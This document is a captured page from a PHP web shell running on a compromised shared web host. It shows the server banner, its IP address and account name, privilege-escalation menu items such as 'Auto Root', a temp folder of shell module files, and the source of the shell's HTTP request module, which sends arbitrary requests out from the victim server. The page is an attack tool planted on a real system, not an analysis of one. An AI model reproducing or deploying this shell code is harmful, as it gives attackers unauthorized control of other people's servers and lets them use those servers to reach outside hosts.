Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.133.113.101
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
tmp /
mbdvd0 /
Delete
Unzip
Name
Size
Permission
Date
Action
sess_0a0651adaaf1f8f0cfc15ba2bd8069c3shells_wso
77.58
KB
-rw-r--r--
2025-04-11 09:40
sess_0da84599553944d82cf5f47f372d18demysql
2.44
KB
-rw-r--r--
2025-04-10 09:42
sess_65beb914521e3326955339d04393766ccms_wp
2.31
KB
-rw-r--r--
2025-04-10 09:42
sess_7342277d99cfbd7ac179ed31fd7dd8adcore
11.94
KB
-rw-r--r--
2025-04-10 09:37
sess_82b3bd03450bff66d731da032b8450dchttp
1.77
KB
-rw-r--r--
2025-04-10 09:37
sess_afd13013d4a645c28817fc52e4eb4879info
428
B
-rw-r--r--
2025-04-10 09:42
sess_bc2071c1be6d1c313aeef168beb5ae06files
14.43
KB
-rw-r--r--
2025-04-10 09:42
sess_f6eb15ce09f3e91a6b4e81577eaf2f66email
896
B
-rw-r--r--
2025-04-10 09:42
Save
Rename
<?php class mbd_http extends mbd_core { function __construct($core) { $this->core = $core; if(isset($this->core->data->options)) $this->_o = $this->core->data->options; } function pget() { $p = isset($this->_o->post) ? $this->_o->post : FALSE; if(isset($this->_o->headers)) $headers = $this->_o->headers; else{ $headers = array( 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' ); if($p) $headers[] = 'Content-Type: application/x-www-form-urlencoded'; } $g = parse_url($this->_o->url); $d = ''; $s = ($g['scheme']=='https'); $h = ($p?'POST':'GET')." ".$g['path']; if(isset($g['query'])) $h .= '?'.$g['query']; $h .= " HTTP/1.1\r\n"; $h .= "Host: ".$g['host']."\r\n"; $h .= implode("\r\n", $headers)."\r\n"; $h .= $p ? "Content-Length: ".strlen($p)."\r\n\r\n".$p."\r\n\r\n" : "Connection: Close\r\n\r\n"; $fp = fsockopen(($s?'ssl://':'').$g['host'], $s?443:80); if($fp) { @fputs($fp, $h); $r = 0; $h = ''; while(!feof($fp)) { $b = fgets($fp, 1024); if($r) $d .= $b; else $h .= $b; if($b == "\r\n") $r = 1; } @fclose($fp); $this->core->data->header = $h; if(isset($this->_o->preg)) $r = preg_match_all($this->_o->preg, $d, $a)===FALSE ? FALSE : $a[1]; else $r = $d; $this->core->data->result = $r; return; } $this->core->out('request error'); } }